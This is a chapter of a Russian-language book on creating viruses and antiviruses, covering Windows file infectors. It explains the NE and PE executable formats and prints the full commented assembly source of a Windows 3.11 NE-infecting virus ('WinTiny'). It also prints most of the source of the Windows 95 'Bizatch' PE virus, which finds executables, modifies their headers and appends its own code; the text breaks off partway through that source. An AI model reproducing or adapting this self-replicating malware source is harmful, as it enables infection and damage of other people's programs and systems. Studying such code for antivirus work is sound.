Вы здесь

Создаем вирус и антивирус. Глава 3. Вирусы под Windows (И. А. Гульев)

Глава 3

Вирусы под Windows

В этой главе рассказано о вирусах, заражающих файлы в операционной среде Windows. Наиболее подробно рассмотрены вирусы под Windows 95. Представлены исходные тексты вирусов с подробными комментариями. Также приведены основные сведения о запускаемых файлах программ под Windows, их структуре, отличиях от файлов DOS.

Вирусы под Windows 3.11

В исполняемом файле Windows содержатся в различных комбинациях код, данные и ресурсы. Ресурсы – это BIN-данные для прикладных программ. Учитывая возможность запуска файла из DOS, формат данных должен распознаваться обеими системами – и DOS, и Windows. Для этого все исполняемые файлы под Windows содержат два заголовка. Первый заголовок (старый) – распознается DOS как программа, выводящая на экран «This program requires Microsoft Windows». Второй заголовок (NewEXE) – для работы в Windows (см. приложение).

Как же заразить Windows NewEXE? На первый взгляд файл формата WinNE – обычный EXE-файл. Начинается он с заголовка EXE для DOS и программы (STUB), которая выводит сообщение «This program requires Microsoft Windows».

Если в EXE-заголовке по смещению 18h стоит число 40h или больше, значит по смещению 3Ch находится смещение заголовка NewEXE. Заголовок NewEXE начинается с символов «NE». Далее идет собственно заголовок, в котором содержатся различные данные, в том числе адреса смещений таблиц сегментов, ресурсов и другие. После заголовка расположена таблица сегментов, за ней – все остальные таблицы, далее размещены собственно сегменты с кодом.

Итак, порядок действий:

1. Адрес заголовка NewEXE (DOS_Header+3Ch) уменьшается на 8.

2. Заголовок NewEXE сдвигается на 8 байт назад.

3. В таблицу сегментов добавляется новый элемент, описывающий сегмент вируса.

4. CS: IP NewEXE изменяется на начало вирусного кода, само тело вируса дописывается в конец файла.

Для загрузки в память (надо перехватить вектор INT 21 h из-под Windows) необходимо использовать функции DPMI (INT 31h). Действия: выделение сегмента, изменение его прав доступа, запись вируса, перехват прерывания 21h (делается с помощью функций DPMI).

В качестве примера приведен полный исходный текст вируса под Windows. Принципы заражения такие же, как и при заражении обычного EXE-файла, – изменяется структура EXE-файла и среда, в которой он работает.


.286

.MODEL TINY

.CODE

;Сохраним регистры и флаги

pushf

pusha

push ds

push es

;Проверим, доступен ли DPMI. Если доступен,

;продолжаем, если нет – выходим

mov ax,1686h

int 2Fh

or ax,ax

jz dpmi_exist

;Восстановим регистры и флаги

exit:

pop es

pop ds

popa

popf

;Запустим программу−носитель

db 0EAh

relocIP dw 0

relocCS dw 0FFFFh

dpmi_exist:

;Выделим линейный блок памяти, используя DPMI

mov ax,0501h

mov cx,0FFFFh

xor bx,bx

int 31h

;Сохраним индекс и 32−битный линейный адрес

;полученного блока памяти в стеке

push si

push di

push bx

push cx

;Создадим дескриптор в таблице LDT

xor ax,ax

mov cx,1

int 31h

;В поле адреса полученного дескриптора

;установим адрес нужного блока памяти

mov bx,ax

mov ax,7

pop dx

pop cx

int 31h

;В поле предела полученного дескриптора

;установим размер выделенного блока памяти

mov ax,8

mov dx,0FFFFh

xor cx,cx

int 31h

;В поле прав доступа полученного дескриптора установим значение,

;соответствующее сегменту данных, доступному для чтения и записи

mov ax,9

mov cl,11110010b

xor ch,ch

int 31h

;Загрузим селектор в регистр DS. После этого регистр DS будет

;указывать на выделенный блок памяти

mov ds,bx

;Читаем из стека и сохраняем в памяти

;индекс полученного блока памяти

pop [mem_hnd+2]

pop [mem_hnd]

;Получим текущую DTA

mov ah,2Fh

int 21h

mov [DTA],bx

mov [DTA+2],es

;Найдем первый EXE−файл (маска *.EXE)

mov ah,4Eh

xor cx,cx

mov dx,OFFSET wild_exe

push ds

push cs

pop ds

int 21h

pop ds

;Если файл найден, перейдем к заражению, иначе освободим

;выделенную область памяти и запустим программу−носитель

jnc found_exe

;Освободим выделенную область памяти

call free

;Запустим программу−носитель

jmp exit

;Перейдем к следующему файлу – этот не подходит

close_exe:

;Закроем файл

mov ah,3Eh

int 21h

;Найдем следующий файл

mov ah,4Fh

int 21h

;Если файл найден, перейдем к заражению, иначе освободим

;выделенную область памяти и запустим программу−носитель

jnc found_exe

;Освободим выделенную область памяти

call free

;Запустим программу−носитель

jmp exit

;Файл найден, проверим его на пригодность к заражению

found_exe:

;Откроем файл для чтения и записи

push ds

lds dx,DWORD PTR [DTA]

add dx,1Eh

mov ax,3D02h

int 21h

pop ds

;Прочтем старый заголовок

mov dx,OFFSET old_hdr

mov bx,ax

mov cx,40h

mov ah,3Fh

int 21h

;Проверим сигнатуру, это EXE−файл?

cmp WORD PTR [old_hdr],”ZM”

jne close_exe

;Проверим смещение таблицы настройки адресов.

;Если значение больше 40h, то это не обычный EXE−файл.

;Не будем сразу делать вывод,

;что это NewEXE, потому что это может оказаться

;PE−, LE−, LX−executable или другой

;(PE−executable описан в разделе,

;посвященном Windows 95, остальные

;типы EXE−файлов в этой книге не рассматриваются)

cmp [old_hdr+18h],WORD PTR 40h

jb close_exe

;Перейдем ко второму заголовку (может быть, это NewEXE?):

;Переводим указатель к смещению, обозначенному в поле 3Ch

mov dx,WORD PTR [old_hdr+3Ch]

mov cx,WORD PTR [old_hdr+3Eh]

mov ax,4200h

int 21h

;Прочитаем второй заголовок

mov dx,OFFSET new_hdr

mov cx,40h

mov ah,3fh

int 21h

;Проверим сигнатуру, если сигнатура ”NE”, то это NewEXE−файл

cmp WORD PTR [new_hdr],”EN”

jne close_exe

;Проверим, для Windows ли предназначен этот файл. Если да, будем

;заражать, иначе переходим к следующему файлу

mov al,[new_hdr+36h]

and al,2

jz close_exe

;Переместим указатель чтения/записи в таблицу сегментов,

;к элементу, обозначающему сегмент точки старта программы.

;Для этого прочтем значение регистра CS при запуске

;этого EXE−файла

mov dx,WORD PTR [new_hdr+16h]

;По номеру сегмента вычислим положение соответствующего ему

;элемента в таблице сегментов

dec dx

shl dx,3

;К результату прибавим смещение таблицы сегментов и смещение

;заголовка NewEXE

add dx,WORD PTR [new_hdr+22h]

add dx,WORD PTR [old_hdr+3ch]

mov cx,WORD PTR [old_hdr+3eh]

;Переместим указатель чтения/записи

mov ax,4200h

int 21h

;Прочтем из таблицы сегментов смещение логического сектора

mov dx,OFFSET temp

mov cx,2

mov ah,3Fh

int 21h

;Вычислим смещение сегмента, опираясь на значения

;смещения логического сектора и множителя секторов

mov dx,WORD PTR [temp]

mov cx,WORD PTR [new_hdr+32h]

xor ax,ax

cal_entry:

shl dx,1

rcl ax,1

loop cal_entry

;Переместим 16 старших бит 32−битного результата в регистр CX

mov cx,ax

;Прибавим к результату смещение стартового адреса (IP)

add dx,WORD PTR [new_hdr+14h]

adc cx,0

;Переместим указатель позиции чтения/записи на точку старта

;программы – результат вычисления

mov ax,4200h

int 21h

;Считаем первые 10 байт после старта программы

mov dx,OFFSET temp

mov cx,10h

mov ah,3Fh

int 21h

;Проверим, заражен ли файл. Если считанные 10 байт в точности

;совпадают с первыми 10−ю байтами нашего вируса, файл заражен.

;В этом случае переходим к поиску следующего, иначе – заражаем

mov si,OFFSET temp

push cs

pop es

xor di,di

mov cx,8

cld

rep cmpsw

jne ok_to_infect

jmp close_exe

;Приступим к заражению

ok_to_infect:

;Переместим NE−заголовок на 8 байт ближе к началу файла.

;Исправим соответствующие поля старого заголовка

sub WORD PTR [old_hdr+10h],8

sub WORD PTR [old_hdr+3ch],8

sbb WORD PTR [old_hdr+3eh],0

;Исправим значения таблиц в новом заголовке, чтобы переместились

;только заголовок и таблица сегментов (без остальных таблиц)

add WORD PTR [new_hdr+4],8

add WORD PTR [new_hdr+24h],8

add WORD PTR [new_hdr+26h],8

add WORD PTR [new_hdr+28h],8

add WORD PTR [new_hdr+2ah],8

;Сохраним оригинальные значения точек входа CS и IP

push WORD PTR [new_hdr+14h]

pop [host_ip]

push WORD PTR [new_hdr+16h]

pop [host_cs]

;Добавим еще один сегмент в таблицу сегментов и установим

;точку входа на его начало

mov WORD PTR [new_hdr+14h],0

inc WORD PTR [new_hdr+1ch]

push WORD PTR [new_hdr+1ch]

pop WORD PTR [new_hdr+16h]

;Переместим указатель чтения/записи в начало файла

;(к старому заголовку)

xor cx,cx

xor dx,dx

mov ax,4200h

int 21h

;Запишем старый заголовок, так как модифицированы

;некоторые поля его копии в памяти

mov dx,OFFSET old_hdr

mov cx,40h

mov ah,40h

int 21h

;Переместим указатель чтения/записи на начало нового

;заголовка (его переместили на 8 байт к началу файла)

mov dx,WORD PTR [old_hdr+3ch]

mov cx,WORD PTR [old_hdr+3eh]

mov ax,4200h

int 21h

;Запишем новый заголовок, так как в его копии

;в памяти некоторые поля модифицированы

mov dx,OFFSET new_hdr

mov cx,40h

mov ah,40h

int 21h

;Переместим указатель чтения/записи на 8 байт

;вперед – к началу таблицы сегментов

xor cx,cx

mov dx,8

mov ax,4201h

int 21h

;Рассчитаем размер таблицы сегментов и считаем ее в память

mov dx,OFFSET temp

mov cx,WORD PTR [new_hdr+1ch]

dec cx

shl cx,3

push cx

mov ah,3Fh

int 21h

;Переместим указатель чтения/записи назад, к позиции

;за 8 байт перед началом таблицы сегментов

pop dx

push dx

add dx,8

neg dx

mov cx,–1

mov ax,4201h

int 21h

;Запишем таблицу сегментов в файл, но не на ее прежнее место,

;а на 8 байт ближе к началу файла

mov dx,OFFSET temp

pop cx

mov ah,40h

int 21h

;Прочтем текущую позицию чтения/записи (конец таблицы сегментов)

xor cx,cx

xor dx,dx

mov ax,4201h

int 21h

;Сохраним в стеке текущую позицию чтения/записи

push dx

push ax

;Получим длину файла, переместив указатель

;чтения/записи в конец файла

xor cx,cx

xor dx,dx

mov ax,4202h

int 21h

;Сохраним в стеке длину файла

push dx

push ax

;Вычислим и сохраним длину логического сектора

mov cx,WORD PTR [new_hdr+32h]

mov ax,1

shl ax,cl

mov [log_sec_len],ax

;Вычислим длину файла в логических секторах

mov cx,ax

pop ax

pop dx

div cx

;Учтем неполный сектор. Если в результате получился

;остаток, увеличим количество секторов

or dx,dx

jz no_rmd

inc ax

no_rmd:

;Заполним поля нового элемента в таблице сегментов

mov [my_seg_entry],ax

mov [my_seg_entry+2],OFFSET vir_end

mov [my_seg_entry+4],180h

mov [my_seg_entry+6],OFFSET vir_end

;Восстановим из стека позицию в файле конца таблицы секторов

pop dx

pop cx

;Переместим указатель чтения/записи к этой позиции

mov ax,4200h

int 21h

;Запишем в конец таблицы новый элемент

mov dx,OFFSET my_seg_entry

mov cx,8

mov ah,40h

int 21h

;Скопируем тело вируса в область памяти, которую выделили

;в начале программы, для изменений в нем. В защищенном режиме

;(а работаем именно в нем), нельзя производить запись в сегмент

;кода. Если по какой−то причине нужно произвести изменение

;в сегменте кода, создается алиасный дескриптор данных

;(дескриптор, содержащий то же смещение и длину,

;что и сегмент кода), и дальнейшая работа ведется с ним.

;В данном случае просто воспользуемся выделенным блоком памяти

push ds

pop es

push cs

pop ds

xor si,si

mov di,OFFSET temp

mov cx,OFFSET vir_end

cld

rep movsb

push es

pop ds

;Инициализируем адрес точки входа

mov si,OFFSET temp

mov WORD PTR [si+relocIP],0

mov WORD PTR [si+relocCS],0FFFFh

;Переместим указатель чтения/записи на новую точку входа

mov ax,[my_seg_entry]

mov cx,[log_sec_len]

mul cx

mov cx,dx

mov dx,ax

mov ax,4200h

int 21h

;Запишем тело вируса в файл

mov dx,OFFSET temp

mov cx,OFFSET vir_end

mov ah,40h

int 21h

;Инициализируем поля перемещаемого элемента

mov WORD PTR [reloc_data],1

mov BYTE PTR [reloc_data+2],3

mov BYTE PTR [reloc_data+3],4

mov WORD PTR [reloc_data+4],OFFSET relocIP

;Запишем перемещаемый элемент

mov dx,OFFSET reloc_data

mov cx,10

mov ah,40h

int 21h

;Закроем файл

mov ah,3Eh

int 21h

;Освободим выделенный блок памяти

call free

;Запустим программу−носитель

jmp exit

;Процедура, освобождающая выделенный блок памяти

free PROC NEAR

mov ax,0502h

mov si,[mem_hnd]

mov di,[mem_hnd+2]

int 31h

ret

free ENDP

;Маска для поиска файлов

wild_exe DB ”*.EXE”,0

;Имя вируса

DB ”WinTiny”

;Идентификатор, указывающий на конец инициализированных данных

vir_end:

;Индекс выделенного блока памяти

mem_hnd DW ?

DW ?

;Адрес текущей DTA

DTA DW ?

DW ?

;Место для хранения старого заголовка

old_hdr DB 40h dup (?)

;Место для хранения нового заголовка

new_hdr DB 40h dup (?)

;Длина логического номера сектора

log_sec_len DW ?

;Новый элемент в таблице сегментов

my_seg_entry DW ?

DW ?

DW ?

DW ?

;Перемещаемый элемент

reloc_data DW ?

DB ?

DB ?

DW ?

;Значение оригинальной точки входа

host_cs DW ?

host_ip DW ?

;Область памяти для использования

temp DB ?

END

Вирусы под Windows 95

Формат Portable Executable используется Win32, Windows NT и Windows 95, что делает его очень популярным, и в будущем, возможно, он станет доминирующим форматом EXE. Этот формат значительно отличается от NE-executable, используемого в Windows 3.11.

Вызов Windows 95 API

Обычные приложения вызывают Windows 95 API (Application Program Interface) используя таблицу импортируемых имен. Когда приложение загружено, данные, необходимые для вызова API, заносятся в эту таблицу. В Windows 95, благодаря предусмотрительности фирмы-производителя Microsoft, модифицировать таблицу импортируемых имен невозможно.

Эта проблема решается непосредственным вызовом KERNEL32. То есть необходимо полностью игнорировать структуру вызова и перейти непосредственно на точку входа DLL.

Чтобы получить описатель (Handle) DLL/EXE, можно использовать вызов API GetModuleHandle или другие функции для получения точек входа модуля, включая функцию получения адреса API GetProcAddress. Как вызывать API, имея возможность вызывать его и в то же время такой возможности не имея? Ответ: вызывать API, расположение которого в памяти известно – это API в файле KERNEL32.DLL, он находится по постоянному адресу.

Вызов API приложениями выглядит приблизительно так:


call API_FUNCTION_NAME


например:


call CreateFileA


После компиляции этот вызов выглядит так:


db 9Ah ;инструкция call

dd ???? ;смещение в таблице переходов


Код в таблице переходов похож на такой:


jmp far [offset into import table]


Смещение в таблице импортируемых имен содержит адрес диспетчера для данной функции API. Этот адрес можно получить с помощью GetProcAddress API. Диспетчер функций выглядит так:


push function value

call Module Entrypoint


Зная точки входа, можно вызывать их напрямую, минуя таблицу этого модуля. Поэтому можно заменить вызовы KERNEL32.DLL в его стандартной точке на вызовы непосредственно функций. Просто сохраняем в стеке значение функции и вызываем точку входа в модуль.

Модуль KERNEL32 располагается в памяти статически – именно так и предполагалось. Но конкретное место его расположения в разных версиях Windows 95 отличается. Это было проверено. Оказалось, что одна функция (получение времени/даты) отличается номером. Для компенсации этих различий добавлена проверка двух различных мест на наличие KERNEL32. Но если KERNEL32 все-таки не найден, вирус возвращает управление программе-носителю.

Адреса и номера функций

Для June Test Release KERNEL32 находится по адресу 0BFF93B95h, для August Release – по адресу 0BFF93C1Dh. Можно найти другие значения функции, используя 32-битный отладчик. В таблице 3.1 приведены адреса функций, которые нужны для работы вируса.

Таблица 3.1. Адреса некоторых функций KERNEL

Соглашения о вызовах

Windows 95 написан на языках C++ (в основном) и Assembler. И, хотя соглашения о вызовах просты для применения, Microsoft их не использует. Все API под Win95 используют Pascal Calling Convention. Пример – API, описанный в файлах справки Visual C++:


FARPROC GetProcAddress(

HMODULE hModule, // описатель DLL−модуля

LPCSTR lpszProc // имя функции

);


На первый взгляд кажется, что достаточно лишь сохранить в стеке описатель DLL-модуля (он стоит перед указателем на имя функции) и вызвать API. Но это не так. Параметры, согласно Pascal Calling Convention, должны быть сохранены в стеке в обратном порядке:


push offset lpszProc

push dword ptr [hModule]

call GetProcAddress


Используя 32-битный отладчик, можно оттрассировать вызов и найти вызов KERNEL32 для каждого конкретного случая. Это позволит получить номер функции и обойтись без необходимой для вызова таблицы импортируемых имен.

Заражение файлов формата PE-executable

Определение положения начала PE-заголовка происходит аналогично поиску начала NE-заголовка. Если смещение таблицы настройки адресов (поле 18h) в заголовке EXE-файла 40h или больше, то по смещению 3Ch находится смещение PE-executable заголовка. Сигнатура PE-executable («PE») находится, как и у NE-executable EXE-файла, в начале нового заголовка.

Внутри PE-заголовка находится таблица объектов. Ее формат наиболее важен по сравнению с прочими. Для добавления вирусного кода в носитель и перехвата вирусом управления необходимо добавить элемент в таблицу объектов.

Основные действия заражения PE-executable файла:

1. Найти смещение заголовка PE-executable в файле.

2. Считать достаточное количество информации из заголовка для вычисления его полного размера.

3. Считать весь PE-заголовок и таблицу объектов.

4. Добавить новый объект в таблицу объектов.

5. Установить точку входа RVA на новый объект.

6. Дописать вирус к файлу по вычисленному физическому смещению.

7. Записать измененный PE-заголовок в файл.

Для определения расположения таблицы объектов следует воспользоваться значением переменной «HeaderSize» (не путать с «NT headersize»), которая содержит совместный размер заголовков DOS, PE и таблицы объектов.

Для чтения таблицы объектов необходимо считать HeaderSize байт от начала файла.

Таблица объектов расположена непосредственно за NT-заголовком. Значение «NTheadersize» показывает количество байт, следующих за полем «flags». Итак, для определения смещения таблицы объектов нужно получить NTheaderSize и добавить размер поля флагов (24).

Добавление объекта: получив количество объектов, умножить его на 40 (размер элемента таблицы объектов). Таким образом определяется смещение, по которому будет расположен вирус.

Данные для элемента таблицы объектов должны быть вычислены с использованием информации в предыдущем элементе (элементе носителя).


RVA=((prev RVA+prev Virtual Size)/OBJ Alignment+1)

*OBJ Alignment

Virtual Size=((size of virus+buffer any space)/OBJ Alignment+1)

*OBJ Alignment

Physical Size=(size of virus/File Alignment+1)*File Alignment

Physical Offset=prev Physical Offset+prev Physical Size

Object Flags=db 40h,0,0,C0h

Entrypoint RVA=RVA


Теперь необходимо увеличить на единицу поле «количество объектов» и записать код вируса по вычисленному «физическому смещению» в размере «физического размера» байт.

Пример вируса под Windows 95

.386

locals

jumps

.model flat,STDCALL

include win32.inc ;некоторые 32−битные константы и структуры

L equ <LARGE>

;Определим внешние функции, к которым будет подключаться вирус

extrn BeginPaint:PROC

extrn CreateWindowExA:PROC

extrn DefWindowProcA:PROC

extrn DispatchMessageA:PROC

extrn EndPaint:PROC

extrn ExitProcess:PROC

extrn FindWindowA:PROC

extrn GetMessageA:PROC

extrn GetModuleHandleA:PROC

extrn GetStockObject:PROC

extrn InvalidateRect:PROC

extrn LoadCursorA:PROC

extrn LoadIconA:PROC

extrn MessageBeep:PROC

extrn PostQuitMessage:PROC

extrn RegisterClassA:PROC

extrn ShowWindow:PROC

extrn SetWindowPos:PROC

extrn TextOutA:PROC

extrn TranslateMessage:PROC

extrn UpdateWindow:PROC

;Для поддержки Unicode Win32 интерпретирует некоторые функции

;для ANSI или расширенного набора символов.

;В качестве примера рассмотрим ANSI

CreateWindowEx equ <CreateWindowExA>

DefWindowProc equ <DefWindowProcA>

DispatchMessage equ <DispatchMessageA>

FindWindow equ <FindWindowA>

GetMessage equ <GetMessageA>

GetModuleHandle equ <GetModuleHandleA>

LoadCursor equ <LoadCursorA>

LoadIcon equ <LoadIconA>

MessageBox equ <MessageBoxA>

RegisterClass equ <RegisterClassA>

TextOut equ <TextOutA>

.data

newhwnd dd 0

lppaint PAINTSTRUCT <?>

msg MSGSTRUCT <?>

wc WNDCLASS <?>

mbx_count dd 0

hInst dd 0

szTitleName db ”Bizatch by Quantum / VLAD activated”

zero db 0

szAlternate db ”more than once”,0

szClassName db ”ASMCLASS32”,0

;Сообщение, выводимое в окне

szPaint db ”Left Button pressed:”

s_num db ”00000000h times.”,0

;Размер сообщения

MSG_L EQU ($−offset szPaint)−1

.code

;Сюда обычно передается управление от загрузчика.

start:

;Получим HMODULE

push L 0

call GetModuleHandle

mov [hInst],eax

push L 0

push offset szClassName

call FindWindow

or eax,eax

jz reg_class

;Пространство для модификации строки заголовка

mov [zero],” ”

reg_class:

;Инициализируем структуру WndClass

mov [wc.clsStyle],CS_HREDRAW+CS_VREDRAW+CS_GLOBALCLASS

mov [wc.clsLpfnWndProc],offset WndProc

mov [wc.clsCbClsExtra],0

mov [wc.clsCbWndExtra],0

mov eax,[hInst]

mov [wc.clsHInstance], eax

;Загружаем значок

push L IDI_APPLICATION

push L 0

call LoadIcon

mov [wc.clsHIcon], eax

;Загружаем курсор

push L IDC_ARROW

push L 0

call LoadCursor

mov [wc.clsHCursor], eax

;Инициализируем оставшиеся поля структуры WndClass

mov [wc.clsHbrBackground],COLOR_WINDOW+1

mov dword ptr [wc.clsLpszMenuName],0

mov dword ptr [wc.clsLpszClassName],offset szClassName

;Регистрируем класс окна

push offset wc

call RegisterClass

;Создаем окно

push L 0 ;lpParam

push [hInst] ;hInstance

push L 0 ;Меню

push L 0 ;hwnd родительского

окна

push L CW_USEDEFAULT ;Высота

push L CW_USEDEFAULT ;Длина

push L CW_USEDEFAULT ;Y

push L CW_USEDEFAULT ;X

push L WS_OVERLAPPEDWINDOW ;Style

push offset szTitleName ;Title Style

push offset szClassName ;Class name

push L 0 ;extra style

call CreateWindowEx

;Сохраняем HWND

mov [newhwnd], eax

;Отображаем окно на экране

push L SW_SHOWNORMAL

push [newhwnd]

call ShowWindow

;Обновляем содержимое окна

push [newhwnd]

call UpdateWindow

;Очередь сообщений

msg_loop:

;Прочитаем следующее сообщение из очереди

push L 0

push L 0

push L 0

push offset msg

call GetMessage

;Если функция GetMessage вернула нулевое значение, то завершаем

;обработку сообщений и выходим из процесса

cmp ax,0

je end_loop

;Преобразуем виртуальные коды клавиш в сообщения клавиатуры

push offset msg

call TranslateMessage

;Передаем это сообщение назад в Windows

push offset msg

call DispatchMessage

;Переходим к следующему сообщению

jmp msg_loop

;Выход из процесса

end_loop:

push [msg.msWPARAM]

call ExitProcess

;Обработка сообщений окна. Win32 требует сохранения регистров

;EBX, EDI, ESI. Запишем эти регистры после ”uses” в строке ”proc”.

;Это позволит Ассемблеру сохранить их

WndProc proc uses ebx edi esi, hwnd:DWORD, wmsg:DWORD, wparam:

DWORD, lparam:DWORD

LOCAL theDC:DWORD

;Проверим, какое сообщение получили, и перейдем к обработке

cmp [wmsg],WM_DESTROY

je wmdestroy

cmp [wmsg],WM_RBUTTONDOWN

je wmrbuttondown

cmp [wmsg],WM_SIZE

je wmsize

cmp [wmsg],WM_CREATE

je wmcreate

cmp [wmsg],WM_LBUTTONDOWN

je wmlbuttondown

cmp [wmsg],WM_PAINT

je wmpaint

cmp [wmsg],WM_GETMINMAXINFO

je wmgetminmaxinfo

;Данная программа не обрабатывает это сообщение.

;Передадим его Windows,

;чтобы оно было обработано по умолчанию

jmp defwndproc

;Сообщение WM_PAINT (перерисовать содержимое окна)

wmpaint:

;Подготовим окно для перерисовки

push offset lppaint

push [hwnd]

call BeginPaint

mov [theDC], eax

;Переведем в ASCII−формат значение mbx_count, которое

;показывает, сколько раз была нажата левая кнопка мыши

mov eax,[mbx_count]

mov edi, offset s_num

call HexWrite32

;Вывод строки в окно

push L MSG_L ;Длина строки

push offset szPaint ;Строка

push L 5 ;Y

push L 5 ;X

push [theDC] ;DC

call TextOut

;Обозначим завершение перерисовки окна

push offset lppaint

push [hwnd]

call EndPaint

;Выходим из обработки сообщения

mov eax, 0

jmp finish

;Сообщение WM_CREATE (создание окна)

wmcreate:

;Выходим из обработки сообщения

mov eax, 0

jmp finish

;Сообщение, не обрабатываемое данной программой, передаем Windows

defwndproc:

push [lparam]

push [wparam]

push [wmsg]

push [hwnd]

call DefWindowProc

;Выходим из обработки сообщения

jmp finish

;Сообщение WM_DESTROY (уничтожение окна)

wmdestroy:

;Закроем поток

push L 0

call PostQuitMessage

;Выходим из обработки сообщения

mov eax, 0

jmp finish

;Сообщение WM_LBUTTONDOWN (нажата левая кнопка мыши)

wmlbuttondown:

inc [mbx_count]

;Обновим содержимое окна

push L 0

push L 0

push [hwnd]

call InvalidateRect

;Выходим из обработки сообщения

mov eax, 0

jmp finish

;Сообщение WM_RBUTTONDOWN (нажата правая кнопка мыши)

wmrbuttondown:

push L 0

call MessageBeep

;Выходим из обработки сообщения

jmp finish

;Сообщение WM_SIZE (изменен размер окна)

wmsize:

;Выходим из обработки сообщения

mov eax, 0

jmp finish

;Сообщение WM_GETMINMAXINFO (попытка изменить размер

;или положение окна)

wmgetminmaxinfo:

;Заполним структуру MINMAXINFO

mov ebx, [lparam]

mov [(MINMAXINFO ptr ebx).mintrackposition_x],350

mov [(MINMAXINFO ptr ebx).mintrackposition_y],60

;Выходим из обработки сообщения

mov eax, 0

jmp finish

;Выходим из обработки сообщения

finish:

ret

WndProc endp

;Процедура перевода байта в ASCII−формат для печати. Значение,

;находящееся в регистре AL, будет записано в ASCII−формате

;по адресу ES:EDI

HexWrite8 proc

;Разделяем байт на полубайты и загружаем их в регистры AH и AL

mov ah,al

and al,0Fh

shr ah,4

;Добавляем 30h к каждому полубайту, чтобы регистры содержали коды

;соответствующих символов ASCII. Если число,

;записанное в полубайте, было больше 9,

;то значение в этом полубайте надо еще корректировать

or ax,3030h

;Меняем полубайты местами, чтобы регистр AH содержал младший

;полубайт, а регистр AL – старший

xchg al,ah

;Проверим, надо ли корректировать младший полубайт,

;если да – корректируем

cmp ah, 39h

ja @@4

;Проверим, надо ли корректировать старший полубайт,

;если да – корректируем

@@1:

cmp al,39h

ja @@3

;Сохраним значение по адресу ES:EDI

@@2:

stosw

ret

;Корректируем значение старшего полубайта

@@3:

sub al, 30h

add al, ”A”–10

jmp @@2

;Корректируем значение младшего полубайта

@@4:

sub ah, 30h

add ah, ”A”–10

jmp @@1

HexWrite8 endp

;Процедура перевода слова в ASCII−формат для печати.

;Значение, находящееся в регистре AX, будет записано

;в ASCII−формате по адресу ES:EDI

HexWrite16 proc

;Сохраним младший байт из стека

push ax

;Загрузим старший байт в регистр AL

xchg al,ah

;Переведем старший байт в ASCII−формат

call HexWrite8

;Восстановим младший байт из стека

pop ax

;Переведем младший байт в ASCII−формат

call HexWrite8

ret

HexWrite16 endp

;Процедура перевода двойного слова в ASCII−формат для печати.

;Значение, находящееся в регистре EAX, будет записано

;в ASCII−формате по адресу ES:EDI

HexWrite32 proc

;Сохраним младшее слово из стека

push eax

;Загрузим старшее слово в регистр AX

shr eax, 16

;Переведем старшее слово в ASCII−формат

call HexWrite16

;Восстановим младшее слово из стека

pop eax

;Переведем младшее слово в ASCII−формат

call HexWrite16

ret

HexWrite32 endp

;Сделаем процедуру WndProc доступной извне

public WndProc

ends

;Здесь начинается код вируса. Этот код переписывается из файла

;в файл. Все вышеописанное – всего лишь программа−носитель

vladseg segment para public ”vlad”

assume cs:vladseg

vstart:

;Вычислим текущий адрес

call recalc

recalc:

pop ebp

mov eax,ebp

db 2Dh ;Код команды SUB AX

subme dd 30000h+(recalc−vstart)

;Сохраним адрес в стеке

push eax

;Вычислим стартовый адрес вирусного кода

sub ebp,offset recalc

;Ищем KERNEL. Возьмем вторую известную нам точку KERNEL

mov eax,[ebp+offset kern2]

;Проверим ключ. Если ключа нет, перейдем к точке 1

cmp dword ptr [eax],5350FC9Ch

jnz notkern2

;KERNEL найден, точка 2

mov eax,[ebp+offset kern2]

jmp movit

;Точка 2 не подошла, проверим точку 1

notkern2:

;Возьмем адрес первой известной нам точки KERNEL

mov eax,[ebp+offset kern1]

;Проверим ключ, если ключа нет – выходим

cmp dword ptr [eax],5350FC9Ch

jnz nopayload

;KERNEL найден, точка 1

mov eax,[ebp+offset kern1]

;KERNEL найден, адрес точки входа находится в регистре EAX

movit:

;Сохраним адрес KERNEL

mov [ebp+offset kern],eax

cld

;Запомним текущую директорию

lea eax,[ebp+offset orgdir]

push eax

push 255

call GetCurDir

;Инициализируем счетчик заражений

mov byte ptr [ebp+offset countinfect],0

;Ищем первый файл

infectdir:

lea eax,[ebp+offset win32_data_thang]

push eax

lea eax,[ebp+offset fname]

push eax

call FindFile

;Сохраним индекс для поиска

mov dword ptr [ebp+offset searchhandle],eax

;Проверим, найден ли файл. Если файл не найден,

;меняем директорию

cmp eax,–1

jz foundnothing

;Откроем файл для чтения и записи

gofile:

push 0

push dword ptr [ebp+offset fileattr] ;FILE_ATTRIBUTE_NORMAL

push 3 ;OPEN_EXISTING

push 0

push 0

push 80000000h+40000000h ;GENERIC_READ+GENERIC_WRITE

lea eax,[ebp+offset fullname]

push eax

call CreateFile

;Сохраним описатель файла

mov dword ptr [ebp+offset ahand],eax

;Проверим, не произошла ли ошибка.

;Если ошибка произошла, ищем следующий файл

cmp eax,–1

jz findnextone

;Поставим указатель позиции чтения/записи на поле

;со смещением PE−заголовка

push 0

push 0

push 3Ch

push dword ptr [ebp+offset ahand]

call SetFilePointer

;Считаем адрес PE−заголовка

push 0

lea eax,[ebp+offset bytesread]

push eax

push 4

lea eax,[ebp+offset peheaderoffset]

push eax

push dword ptr [ebp+offset ahand]

call ReadFile

;Поставим указатель позиции чтения/записи на начало PE−заголовка

push 0

push 0

push dword ptr [ebp+offset peheaderoffset]

push dword ptr [ebp+offset ahand]

call SetFilePointer

;Считаем число байт, достаточное для вычисления полного размера

;PE−заголовка и таблицы объектов

push 0

lea eax,[ebp+offset bytesread]

push eax

push 58h

lea eax,[ebp+offset peheader]

push eax

push dword ptr [ebp+offset ahand]

call ReadFile

;Проверим сигнатуру. Если ее нет, закрываем

;этот файл и ищем следующий

cmp dword ptr [ebp+offset peheader],00004550h;

jnz notape

;Проверим файл на зараженность. Если файл заражен,

;то закрываем этот файл и ищем следующий

cmp word ptr [ebp+offset peheader+4ch],0F00Dh

jz notape

cmp dword ptr [ebp+offset 52],4000000h

jz notape

;Поставим указатель позиции чтения/записи на начало PE−заголовка

push 0

push 0

push dword ptr [ebp+offset peheaderoffset]

push dword ptr [ebp+offset ahand]

call SetFilePointer

;Считаем весь PE−заголовок и таблицу объектов

push 0

lea eax,[ebp+offset bytesread]

push eax

push dword ptr [ebp+offset headersize]

lea eax,[ebp+offset peheader]

push eax

push dword ptr [ebp+offset ahand]

call ReadFile

;Установим признак заражения

mov word ptr [ebp+offset peheader+4ch],0F00Dh

;Найдем смещение таблицы объектов

xor eax,eax

mov ax, word ptr [ebp+offset NtHeaderSize]

add eax,18h

mov dword ptr [ebp+offset ObjectTableoffset],eax

;Вычислим смещение последнего (null) объекта в таблице объектов

mov esi,dword ptr [ebp+offset ObjectTableoffset]

lea eax,[ebp+offset peheader]

add esi,eax

